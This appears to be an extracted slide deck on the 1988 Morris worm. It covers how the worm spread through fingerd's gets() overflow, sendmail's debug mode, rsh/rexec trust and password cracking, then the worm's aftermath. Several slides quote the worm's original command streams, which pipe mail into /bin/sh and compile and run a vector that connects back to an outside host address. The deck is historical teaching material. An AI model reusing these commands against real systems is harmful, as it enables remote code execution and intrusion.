Crisis And Aftermath
description
Transcript of Crisis And Aftermath
![Page 2: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/2.jpg)
Contents
IntroductionWorm vs. VirusWorm History
example
How the worm operatedCrisisAftermath
![Page 3: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/3.jpg)
Worm vs. Virus
Worm VirusCan run independently? Yes No
How this operated? Consume the resource of its host
Insert itself into a host’s some program
When invoked? Itself When infected program is running
![Page 4: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/4.jpg)
Worm History
1975 John Brunner’s Science fiction1981 Xerox PARC experimented 1988 Worm Started*
…2003 SQL Slammer worm (1.25 인터넷대란 )
![Page 5: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/5.jpg)
03’ 1.25 인터넷 대란
2003 년 1 월 25 일 Microsoft SQL server를 대상으로 하는 slammer worm 활동404bytes 를 1434/udp (SQL Server Resolution Service Port) 로 전송
![Page 6: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/6.jpg)
finger
finger : allows user to obtain information about other user over TPC/IPCommon Unix systems run a demon of finger (fing
erd)The worm broke fingerd program by “buffer overru
n” The worm exploited gets() call
![Page 7: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/7.jpg)
finger
Example)
in gets(), we set a buffer as 10. (ex. char buff[10]; )
Type over 11 characters buffer overflow
When buffer overflow error occurred,Normal cases : core dumped and exitBut, the worm : overwriting stack info and
causes returning to worm program code. So worm can run alone.
![Page 8: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/8.jpg)
sendmail
sendmail is mailer program to route mail in a heterogeneous network.
By debug option, tester can run programs to display the state of the mail system without sending mail or establishing a separate login connection.
Worm use debug option to invoke set of commands instead of user address
![Page 9: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/9.jpg)
password
Password mechanism in UNIX system1. Insert password2. “Encryption standard algorithm” encrypted3. Compare with Previously encrypted
password4. If it is same, we get a accessibility
Trusted logins to avoid having to repeatedly type Passwords
rlogin runs without password checking
![Page 10: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/10.jpg)
How worm operated
Main Program : collect information on other machines in the network
Vector Program : try to infect other machines with information obtained
![Page 11: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/11.jpg)
How worm operated (cont’d)
How it works1. Connect to target2. Transfer source code of each part3. Compile it4. Run it5. Collect information 6. Try to connect to other machines
![Page 12: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/12.jpg)
Step 1, 2 : Connection & Send
1. A socket established between vector and infecting machine
2. Vector tries one of two methods1. Using TCP connection to /bin/sh2. Using SMTP
![Page 13: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/13.jpg)
Step 2 : Connection (cont’d)
echo ….. > x14481910.c[text of vector..]
DebugMain from: </dev/null>rcpt to: <“|sed –e ‘1,/^$/’d | /bin/sh ; exit 0” > data cd /usr/tmp cat > x14481910.c << ‘EOF’ [text of vector ..] EOF
cc –o x14481910 x14481910.c./x1448190 128.32.134.16 32341 8712440rm –f x14481910 x14481910.cquit
![Page 14: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/14.jpg)
Step 3 : file transfer
Vector connected to the ‘server’Transfer 3 files
Sun3, VAX binary version of worm Source code of Vector
Vector became a shell with its input, output still connected to the serverUsing execl
![Page 15: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/15.jpg)
Step 4 : Infect Host
Server sent the command streamto the connected shellPATH=/bin:/usr/bin:/usr/ucbrm –f shif [ -f sh ]then p=x1448190else p=shfi
Then for each binarycc –o $P x14481910,sun3.o./$P –p $$ x14481910,sun3.o x14481910,vax.o x14481910,11.crm –f $P
![Page 16: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/16.jpg)
Step 5 : Hide Worm
New worm hides itselfObscuring its argument vectorUnlinking the binary version of itselfKilling its parentRead worm binary into memory and
encryptAnd delete file from disk
![Page 17: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/17.jpg)
Step 6 : Information gathering
The worm gathers information aboutNetwork interfaceHosts to which the local machines was connected
Using ioctl, netstat
It built lists of these in memory
![Page 18: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/18.jpg)
Step 7 : reachability
Connected status Directly connected? Host type? (gateway or local host)
Try to connect using telnet, rexec
![Page 19: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/19.jpg)
Step 8 : Infection Attempts
Attack via rsh /usr/bin/rsh, /bin/rsh
Can be used without password checking If successful, go to step 1 and step 2.1
Finger Stack overflow attacking Return stack frame for main routing changed to execve(“/bi
n/sh”, 0 , 0)If successful, go to step 1 and step 2.1
Connection to SMTP Step 2.2
![Page 20: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/20.jpg)
Step 9 : infected machine information
1. Collect info/etc/hosts.equiv and /.rhosts/etc/passwd.forward
2. Cracking passwd using simple choices3. Cracking passwd with an internal dictionary of word
s4. Cracking passwd with /usr/dict/words5. Loop forever trying to infect hosts in its internal tab
les
![Page 21: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/21.jpg)
Step 10
Break into remote machinesRead .forward , .rhosts for user accounts
Create the remote shellRemote rexec servicerexec to the current host
rsh to the remote host .rhosts or host.equiv file on remote server
![Page 22: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/22.jpg)
Characteristics
Check for other worms runningOne of 7 worms become immortalFork itself and kill parentRe-infect the same machine every 12 hoursThere are no stop code
![Page 23: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/23.jpg)
Aftermath
First wormAround 6000 major UNIX machines were infected ( 10% of the network at that time)Important nation-wide gateways were shutdownTopic debatedpunishment
![Page 24: Crisis And Aftermath](https://reader036.fdocuments.net/reader036/viewer/2022070418/5681599f550346895dc6ece5/html5/thumbnails/24.jpg)
Then …
Robert T. Morris arrestedHe just want to make a tool to gauge the size of the internet3 years probation, fine, community service
Computer Emergency Response Team was established